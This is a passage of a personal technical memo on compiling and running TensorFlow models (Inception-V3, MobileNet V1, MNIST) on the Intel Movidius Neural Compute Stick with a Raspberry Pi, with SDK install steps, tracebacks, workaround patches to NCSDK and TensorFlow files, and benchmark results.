                                                keep_prob_conv: 1.0, keep_prob_hidden: 1.0})
print("test accuracy of the student model is %g "%(test_acc))

# In[11]:
fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()
Running pretrained models from the TensorFlow Model Zoo on Movidius (Inception-V3 and MobileNet V1)
Method
The procedure is described here: https://movidius.github.io/ncsdk/tf_modelzoo.html
Download the sources.
git clone https://github.com/tensorflow/tensorflow.git
git clone https://github.com/tensorflow/models.git
Download the pretrained checkpoint.
wget -nc http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gz
tar -xvf inception_v3_2016_08_28.tar.gz
Export the GraphDef file.
python3 ../models/research/slim/export_inference_graph.py \
    --alsologtostderr \
    --model_name=inception_v3 \
    --batch_size=1 \
    --dataset_name=imagenet \
    --image_size=299 \
    --output_file=inception_v3.pb
Freeze the graph.
python3 ../tensorflow/tensorflow/python/tools/freeze_graph.py \
    --input_graph=inception_v3.pb \
    --input_binary=true \
    --input_checkpoint=inception_v3.ckpt \
    --output_graph=inception_v3_frozen.pb \
    --output_node_name=InceptionV3/Predictions/Reshape_1
mvNCCompile -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1
Trying it out
At the freeze step:
tokunn@tokunn-VirtualBox 16:13:16 [~/Documents/MovidiusTensorflow/use_modelzoo/inceptionV3]
$ python3 ~/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py \
> --input_graph=inception_v3.pb \
--input_binary=true \
--input_checkpoint=inception_v3.ckpt \
--output_graph=inception_v3_frozen.pb \
--output_node_name=InceptionV3/Predictions/Reshape_1
Traceback (most recent call last):
  File "/home/tokunn/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py", line 58, in <module>
    from tensorflow.python.training import checkpoint_management
ImportError: cannot import name 'checkpoint_management'
It does not work.
Apparently this is a bug: https://github.com/tensorflow/tensorflow/issues/22019
Apply a patch, as usual.
58d57
< from tensorflow.python.training import checkpoint_management
59a59
> import tensorflow as tf
127c127
< not checkpoint_management.checkpoint_exists(input_checkpoint)):
---
> not tf.train.checkpoint_exists(input_checkpoint)):
The frozen graph was written out successfully.
Checking with mvNCCheck:
tokunn@nanase 7:41:25 [~]
$ mvNCCheck -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1 2>/dev/null
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016
Result: (1, 1, 1001)
1) 22 0.1576
2) 93 0.1223
3) 95 0.0448
4) 23 0.03558
5) 24 0.02771
Expected: (1, 1001)
1) 22 0.1599765
2) 93 0.12189513
3) 95 0.04604088
4) 23 0.03503471
5) 24 0.02783106
------------------------------------------------------------
 Obtained values
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 1.4900462701916695% (max allowed=2%), Pass
 Obtained Average Pixel Accuracy: 0.01522512175142765% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass
 Obtained Pixel-wise L2 error: 0.06495287965302322% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.02438097447156906
------------------------------------------------------------
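It ran without problems.
Trying another network (MobileNet V1)
List of networks: https://github.com/tensorflow/models/tree/master/research/slim/nets
List of weights: https://github.com/tensorflow/models/tree/master/research/slim
Preparing the model
The network name is mobilenet_v1.
The weights are at http://download.tensorflow.org/models/mobilenet_v1_2018_02_22/mobilenet_v1_0.5_160.tgz
It turned out that the downloaded weights archive also contains mobilenet_v1_0.5_160_frozen.pb.
So all that is left is to compile.
Finding the input/output nodes
Look for the nodes in the .pb file.
The code is attached under "Source code".
Result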
tokunn@tokunn-VirtualBox 17:02:17 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py]
$ python3 getnodename_pb.py | grep input
input , Placeholder
tokunn@tokunn-VirtualBox 17:03:10 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py]
$ python3 getnodename_pb.py | grep Predictions
MobilenetV1/Predictions/Reshape_1 , Reshape
The input and output nodes are probably this input and MobilenetV1/Predictions/Reshape_1.
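Instead of grepping for likely names, one could narrow down candidates from the graph structure: treat Placeholder nodes as inputs and nodes that no other node consumes as outputs. The following is only a sketch under assumptions: `find_io_candidates` and the `Node` tuple are hypothetical names, and the toy node list stands in for `graph_def.node` from the node-listing script (real NodeDef objects expose the same `name`, `op`, and `input` fields).

```python
from collections import namedtuple

# Stand-in for a TensorFlow NodeDef: only the three fields used here.
Node = namedtuple("Node", ["name", "op", "input"])


def find_io_candidates(nodes):
    """Return (inputs, outputs) guessed from graph structure.

    inputs  : nodes whose op is "Placeholder"
    outputs : nodes that are never listed as an input of another node
    """
    consumed = set()
    for node in nodes:
        for ref in node.input:
            # Input references may look like "name:0" or "^name" (control dependency).
            consumed.add(ref.lstrip("^").split(":")[0])
    inputs = [n.name for n in nodes if n.op == "Placeholder"]
    outputs = [n.name for n in nodes if n.name not in consumed]
    return inputs, outputs


# Toy graph (hypothetical and heavily shortened) using the node names found above.
toy_nodes = [
    Node("input", "Placeholder", []),
    Node("some/hidden/layer", "Conv2D", ["input"]),
    Node("MobilenetV1/Predictions/Reshape_1", "Reshape", ["some/hidden/layer:0"]),
]
inputs, outputs = find_io_candidates(toy_nodes)
print(inputs, outputs)
```

On a real frozen graph this heuristic may return several output candidates, so the result still needs a sanity check by eye.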
Compile
Everything went smoothly up to here, so on to compiling.
mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1
As expected, the battle with errors never ends.
tokunn@tokunn-VirtualBox 17:10:23 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 mvNCCompile v02.00, Copyright @ Movidius Ltd 2016 /home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py:923: DeprecationWarning: builtin type EagerTensor has no __module__ attribute EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase) /home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/tf_inspect.py:75: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead return _inspect.getargspec(target) 1 Traceback (most recent call last): File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1278, in _do_call return fn(*args) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1263, in _run_fn options, feed_dict, fetch_list, target_list, run_metadata) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1350, in _call_tf_sessionrun run_metadata) tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3] [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]] During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/local/bin/mvNCCompile", line 118, in <module> create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights) File "/usr/local/bin/mvNCCompile", line 104, in create_graph net = parse_tensor(args, myriad_config) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 1061, in parse_tensor desired_shape = node.inputs[1].eval() File 
"/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 680, in eval return _eval_using_default_session(self, feed_dict, self.graph, session) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 4951, in _eval_using_default_session return session.run(tensors, feed_dict) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 877, in run run_metadata_ptr) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1100, in _run feed_dict_tensor, options, run_metadata) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1272, in _do_run run_metadata) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1291, in _do_call raise type(e)(node_def, op, message) tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3] [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]] Caused by op 'input', defined at: File "/usr/local/bin/mvNCCompile", line 118, in <module> create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights) File "/usr/local/bin/mvNCCompile", line 104, in create_graph net = parse_tensor(args, myriad_config) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 211, in parse_tensor tf.import_graph_def(graph_def, name="") File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/deprecation.py", line 454, in new_func return func(*args, **kwargs) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 442, in import_graph_def _ProcessNewOps(graph) File 
"/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 234, in _ProcessNewOps for new_op in graph._add_new_tf_operations(compute_devices=False): # pylint: disable=protected-access File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in _add_new_tf_operations for c_op in c_api_util.new_tf_operations(self) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in <listcomp> for c_op in c_api_util.new_tf_operations(self) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3180, in _create_op_from_tf_operation ret = Operation(c_op, self) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 1717, in __init__ self._traceback = tf_stack.extract_stack() InvalidArgumentError (see above for traceback): You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3] [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]
It looks like nothing is being fed to the input placeholder?
Surely that is not my fault?
I just got exactly the same problem. Hope someone can help
Sad.
https://github.com/ardamavi/Intel-Movidius-NCS-Keras/issues/2
The project is still in construction. Stay tuned!
This project is open source. If you share your patch, let's try to fix it together.
Sad.
I have come across similar problem, solved by modifying ncsdk source. In /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line 1059, add a feed_dict to eval:
The theory: as usual, /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py is the one misbehaving.
1061c1061
< desired_shape = node.inputs[1].eval()
---
> desired_shape = node.inputs[1].eval(feed_dict={inputnode + ':0' : input_data})
Cheerfully applying yet another patch today.
tokunn@tokunn-VirtualBox 17:25:33 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1]
$ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016
1
Did it pass?
The output looks suspiciously short.
Check!
tokunn@nanase 8:32:09 [~]
$ mvNCCheck -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290
USB: Transferring Data...
USB: Myriad Execution Finished
USB: Myriad Connection Closing.
USB: Myriad Connection Closed.
Result: (1, 1, 1001)
1) 447 0.03534
2) 534 0.02742
3) 825 0.02272
4) 701 0.02151
5) 736 0.02039
Expected: (1, 1001)
1) 447 0.035791013
2) 534 0.027337724
3) 825 0.02282799
4) 701 0.021315519
5) 736 0.020063626
------------------------------------------------------------
 Obtained values
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 2.3404913023114204% (max allowed=2%), Fail
 Obtained Average Pixel Accuracy: 0.06249707657843828% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0999000999000999% (max allowed=0%), Fail
 Obtained Pixel-wise L2 error: 0.14634640928212883% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.022390704602003098
------------------------------------------------------------
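Min Pixel Accuracy is over the 2% limit (2.34%), so two checks fail, but the top-5 classes match the expected ones, so it seems to be working more or less correctly.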
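To put a number on "more or less correct", the top-5 lists from the log can be compared directly. This is a minimal sketch and not how mvNCCheck computes its own metrics: `same_ranking` and `max_relative_diff` are hypothetical helpers, and only the five values printed in the log are used.

```python
# Top-5 (class, probability) pairs copied from the mvNCCheck log above.
result = [(447, 0.03534), (534, 0.02742), (825, 0.02272), (701, 0.02151), (736, 0.02039)]
expected = [(447, 0.035791013), (534, 0.027337724), (825, 0.02282799),
            (701, 0.021315519), (736, 0.020063626)]


def same_ranking(a, b):
    """True when both lists name the same classes in the same order."""
    return [cls for cls, _ in a] == [cls for cls, _ in b]


def max_relative_diff(a, b):
    """Largest |a - b| / |b| over entries paired by position."""
    return max(abs(pa - pb) / abs(pb) for (_, pa), (_, pb) in zip(a, b))


ranking_ok = same_ranking(result, expected)
worst = max_relative_diff(result, expected)
print(ranking_ok, "{:.2%}".format(worst))
```

For classification only the ranking matters, which is why a small numeric deviation like this can be tolerable even though mvNCCheck reports Fail.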
Running it
Feed in actual images and run it.
tokunn@nanase 10:41:39 [~/mobilenet] $ python3 pr_mvd_mblnet.py flower ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory Image path : flower/*.jpg imgshape (508, 75, 75) Start prediting ... 534 534 534 534 534 534 534 534 534 534 534 534 540 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 825 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 540 534 742 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 751 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 
534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 Time : 7.718486547470093 (508 images)
It ran successfully.
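The raw log is hard to read at a glance, so here is a small sketch that turns the reported time into per-image throughput and tallies predicted classes. `throughput` and `tally` are hypothetical helper names, and the class list passed to `tally` is a short made-up excerpt, not the full run.

```python
from collections import Counter


def throughput(total_seconds, n_images):
    """Return (milliseconds per image, images per second)."""
    return 1000.0 * total_seconds / n_images, n_images / total_seconds


def tally(predictions):
    """Count how often each class index was predicted, most frequent first."""
    return Counter(predictions).most_common()


# Timing taken from the log above: 508 images in about 7.72 s.
ms_per_image, images_per_second = throughput(7.718486547470093, 508)
print("{:.1f} ms/image, {:.1f} images/s".format(ms_per_image, images_per_second))

# Short hypothetical excerpt of predicted class indices, not the full run.
print(tally([534, 534, 540, 534, 825, 534]))
```

A tally like this makes it obvious when one class dominates the predictions, which is worth double-checking against the actual image contents.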
Conclusion
Judging from these two networks, models from the Model Zoo can be used on Movidius.
Source code
Code to list the nodes in a .pb file
#!/usr/bin/env python3
import tensorflow as tf
from tensorflow.python.platform import gfile

filename = '../mobilenet_v1_0.5_160_frozen.pb'
node_ops = []
with tf.gfile.GFile(filename, "rb") as f:
    graph_def = tf.GraphDef()
    graph_def.ParseFromString(f.read())
    for node in graph_def.node:
        print(str(node.name) + " , " + str(node.op))
Code to export a .pb from Keras
https://stackoverflow.com/questions/45466020/how-to-export-keras-h5-to-tensorflow-pb
import tensorflow as tf


def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
    """
    Freezes the state of a session into a pruned computation graph.

    Creates a new computation graph where variable nodes are replaced by
    constants taking their current value in the session. The new graph will be
    pruned so subgraphs that are not necessary to compute the requested
    outputs are removed.
    @param session The TensorFlow session to be frozen.
    @param keep_var_names A list of variable names that should not be frozen,
                          or None to freeze all the variables in the graph.
    @param output_names Names of the relevant graph outputs.
    @param clear_devices Remove the device directives from the graph for better portability.
    @return The frozen graph definition.
    """
    from tensorflow.python.framework.graph_util import convert_variables_to_constants
    graph = session.graph
    with graph.as_default():
        freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
        output_names = output_names or []
        output_names += [v.op.name for v in tf.global_variables()]
        input_graph_def = graph.as_graph_def()
        if clear_devices:
            for node in input_graph_def.node:
                node.device = ""
        frozen_graph = convert_variables_to_constants(session, input_graph_def,
                                                      output_names, freeze_var_names)
        return frozen_graph


from keras import backend as K

# Create, compile and train model...

frozen_graph = freeze_session(K.get_session(),
                              output_names=[out.op.name for out in model.outputs])
tf.train.write_graph(frozen_graph, "some_directory", "my_model.pb", as_text=False)
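Notes on running TensorFlow models on a Raspberry Pi with the Intel Movidius Neural Compute Stick
Overview
I want to do image recognition with TensorFlow on a Raspberry Pi!
But running TensorFlow on the Raspberry Pi's CPU is painfully slow.
That is where the Intel Movidius comes in: plug it into the RPi and inference becomes dramatically faster.
Getting it to work took a lot of effort, so I am leaving these notes.
Note that it can only do inference. Do the training on another computer.
The procedure is:
- Train with TensorFlow on a high-spec computer
- Save the trained TensorFlow model and compile it into a graph that runs on Movidius
- Bring the graph over to the RPi and run inference on Movidius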
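About this article
What follows is a copy-paste of the notes I wrote while working.
They were not written to explain anything, so they are probably quite hard to read.
If you have questions, ask me on Twitter:
とーくん (@KTokunn) | Twitter
This is a long-winded memo, so I do not recommend reading it from start to finish.
Use ctrl+f to search for keywords from your error message.
What I did
- Ran the TensorFlow low-level MNIST sample (deep mnist) on Movidius
- Rewrote the library so that mvNCCompile, mvNCProfile, and mvNCCheck work (for some reason these tools did not work correctly in my environment)
- Feeding images into mvNCCheck was done by brute force
Also, a lot of the output has been folded into details tags.
About the Movidius NCSDK
What is the NCSDK
The Movidius NCSDK is an SDK that contains the compiler tools for converting and checking models for Movidius, and the API for running inference with those models.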
mvNCCompile, mvNCCheck, mvNCProfile
Movidius NCSDK versions
- NCSDK1
- NCSDK2
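NCAPI v2, which ships with NCSDK2, uses different API functions, so it is not compatible with v1.
There is more information available for NCSDK1, so that is what I use here.
Apparently SDK1 can only use 16-bit floats, while SDK2 can use 32-bit floats (?)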
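To get a feel for what 16-bit floats mean numerically, the sketch below rounds a value to IEEE 754 half precision using only the standard library. It says nothing about how the NCSDK itself handles precision; `to_float16` and `relative_error` are hypothetical helper names and the sample value is arbitrary.

```python
import struct


def to_float16(value):
    """Round a Python float to the nearest IEEE 754 half-precision value."""
    return struct.unpack("<e", struct.pack("<e", value))[0]


def relative_error(value):
    """Relative error introduced by storing `value` as a 16-bit float."""
    return abs(to_float16(value) - value) / abs(value)


# Arbitrary illustrative value, about the size of a softmax probability.
sample = 0.1599765
print(to_float16(sample), relative_error(sample))
```

Half precision keeps roughly three significant decimal digits, so for normal-range values the rounding error of a single number stays below about 0.05%.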
Using the Movidius NCSDK from TensorFlow
- Write the program in TensorFlow.
- Save the model.
- Open the model in TensorFlow, edit it, and save it again.
- Compile the saved model into a graph for Movidius.
- Transfer the graph to the Movidius and run it.
Installing the NCSDK
For details see https://movidius.github.io/ncsdk/install.html
On a Raspberry Pi 3, each version takes about 4 hours.
NCSDK1
wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-01_12_00_01-full/ncsdk-1.12.00.01.tar.gz
NCSDK2
wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-02_05_00_02-full/ncsdk-2.05.00.02.tar.gz
Common steps
tar xvf ncsdk-*
cd ncsdk-*
make install
make examples
Running the example (v1, v2)
An Inception-V3 example is located in ncsdk-*/examples/tensorflow/inception_v3.
File layout
Makefile
inception-v3.py
run.py
categories.txt
inputsize.txt
Behavior
Running make invokes inception-v3.py and mvNCCompile.
inception-v3.py downloads the pretrained Inception-V3 model and saves the ckpt.meta file.
The model is taken from tensorflow.contrib.slim.nets.
mvNCCompile creates the graph file from ckpt.meta.
Running make run invokes run.py.
run.py loads the graph file onto the Movidius, runs inference on a single image, and prints the result.
Results
Number of categories: 1001
Start download to NCS...
*******************************************************************************
inception-v3 on NCS
*******************************************************************************
547 electric guitar 0.9883
403 acoustic guitar 0.00772
715 pick, plectrum, plectron 0.001509
421 banjo 0.000926
820 stage 0.0006595
*******************************************************************************
Finished
It ran correctly with both the V1 and V2 APIs and produced electric guitar as the output.
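1. Without Movidius
[10.55, 2.15, 2.16, 2.10, 3.90, 2.12, n/a, n/a, n/a, n/a] (10 runs, in seconds)
RAM usage: about 90%
CPU usage: about 90%
Running predict sometimes makes dmesg show "Under-voltage detected!". When that appears, predict takes longer.
Running it several times in a row brings the system down, possibly because of insufficient power (from the 7th run onward in these results).
2. With Movidius
[0.62, 0.59, 0.60, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61] (10 runs, in seconds)
RAM usage: about 10%
CPU usage: about 5%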
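As a rough summary of these timings, the mean and median can be compared. This is just arithmetic on the numbers listed above; the four runs that never completed without Movidius are left out, and since the first run without Movidius is an outlier, the median is probably the fairer figure.

```python
from statistics import mean, median

# Seconds per predict call, copied from the measurements above.
# Runs 7 to 10 without Movidius are missing because the system went down.
without_ncs = [10.55, 2.15, 2.16, 2.10, 3.90, 2.12]
with_ncs = [0.62, 0.59, 0.60, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61]

mean_speedup = mean(without_ncs) / mean(with_ncs)
median_speedup = median(without_ncs) / median(with_ncs)

print("mean:   {:.2f} s -> {:.3f} s ({:.1f}x)".format(
    mean(without_ncs), mean(with_ncs), mean_speedup))
print("median: {:.3f} s -> {:.2f} s ({:.1f}x)".format(
    median(without_ncs), median(with_ncs), median_speedup))
```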
Compiling an arbitrary TensorFlow model (compiling your own model)
Training
To compile your own TensorFlow model for Movidius, the source code has to be edited to suit Movidius.
1. Give the input Placeholder a name
2. Save the trained network with tf.train.Saver()
This generates three files:
****.index
****.data-00000-of-00001
****.meta
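Converting to compilable files
Next, open the generated trained model again and write out a model that Movidius can compile. The changes are:
1. Give the output activation function a name
2. Remove every Placeholder other than the input
3. Remove dropout
4. Remove the loading of training data
5. Remove training-only code such as loss, training, and accuracy
With code changed this way, open the saved model with restore and save it again.
This generates three files:
****_inference.index
****_inference.data-00000-of-00001
****_inference.meta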
Compile
Use the mvNCCompile command to convert the saved ****.meta file into a graph file.
mvNCCompile ****_inference.meta -s 12 -in input -on output -o ****_inference.graph
Here, replace input and output with the names you gave to the input node and the output node, respectively.
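When several models need compiling, it can help to assemble the command line in a script. The sketch below only builds the argument list with the same flags used in this memo (-s, -in, -on, -o); `build_compile_command` is a hypothetical helper, not part of the NCSDK.

```python
import shlex


def build_compile_command(meta_file, input_node, output_node, graph_file, shaves=12):
    """Assemble the mvNCCompile argument list used in this memo."""
    return [
        "mvNCCompile", meta_file,
        "-s", str(shaves),
        "-in", input_node,
        "-on", output_node,
        "-o", graph_file,
    ]


cmd = build_compile_command("mnist_inference.meta", "input", "output",
                            "mnist_inference.graph")
# Print a copy-pastable command line; subprocess.run(cmd, check=True) would execute it.
print(" ".join(shlex.quote(part) for part in cmd))
```

Keeping the arguments as a list avoids shell quoting problems with node names that contain slashes or colons.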
Results
I tried deep_mnist.py from the TensorFlow examples.
tokunn@tokunn-VirtualBox 11:31:44 [~/Documents/MovidiusTensorflow/mnist]
$ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016
/usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 293, in parse_tensor
    if have_first_input(strip_tensor_id(node.outputs[0].name)):
IndexError: list index out of range
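Everything works up to the file conversion, but at compile time mvNCCompile stops with an IndexError raised internally. The cause is that a list is indexed without first checking whether it has any elements.
Rewriting the library
Edit /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py to work around it.
Whether this is a legitimate thing to do is unclear.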
< if have_first_input(strip_tensor_id(node.outputs[0].name)):
---
> # ******* EDIT ******
> print(len(node.outputs))
> if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):
With this change mvNCCompile passes and the graph file is generated.
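The patch works because `and` short-circuits: when an operation has no outputs, the index access is never evaluated. Here is a minimal stand-alone sketch of the same guard; `Tensor`, `Op`, and `first_output_matches` are hypothetical stand-ins, not the NCSDK's or TensorFlow's actual classes.

```python
from collections import namedtuple

# Minimal stand-ins for TensorFlow operations and tensors (hypothetical).
Tensor = namedtuple("Tensor", ["name"])
Op = namedtuple("Op", ["name", "outputs"])


def first_output_matches(op, wanted_name):
    """Return True if the op has outputs and its first output is `wanted_name`.

    `len(op.outputs) and ...` short-circuits, so `op.outputs[0]` is never
    evaluated for an op without outputs, which is what raised IndexError.
    """
    return bool(len(op.outputs) and op.outputs[0].name.split(":")[0] == wanted_name)


ops = [
    Op("input", [Tensor("input:0")]),
    Op("init", []),  # hypothetical op that produces no output tensors
]
print([first_output_matches(op, "input") for op in ops])
```

Ops without outputs are simply skipped by the check; whether skipping them is always safe inside the parser is a separate question.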
tokunn@tokunn-VirtualBox 11:36:34 [~/Documents/MovidiusTensorflow/mnist]
$ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016
/usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
1
1
1
1
0
1
/usr/local/bin/ncsdk/Controllers/FileIO.py:52: UserWarning: You are using a large type. Consider reducing your data sizes for best performance
  "Consider reducing your data sizes for best performance\033[0m")
Checking operation on Movidius (v1)
Actually run it. From here on, API v1 is used unless noted otherwise.
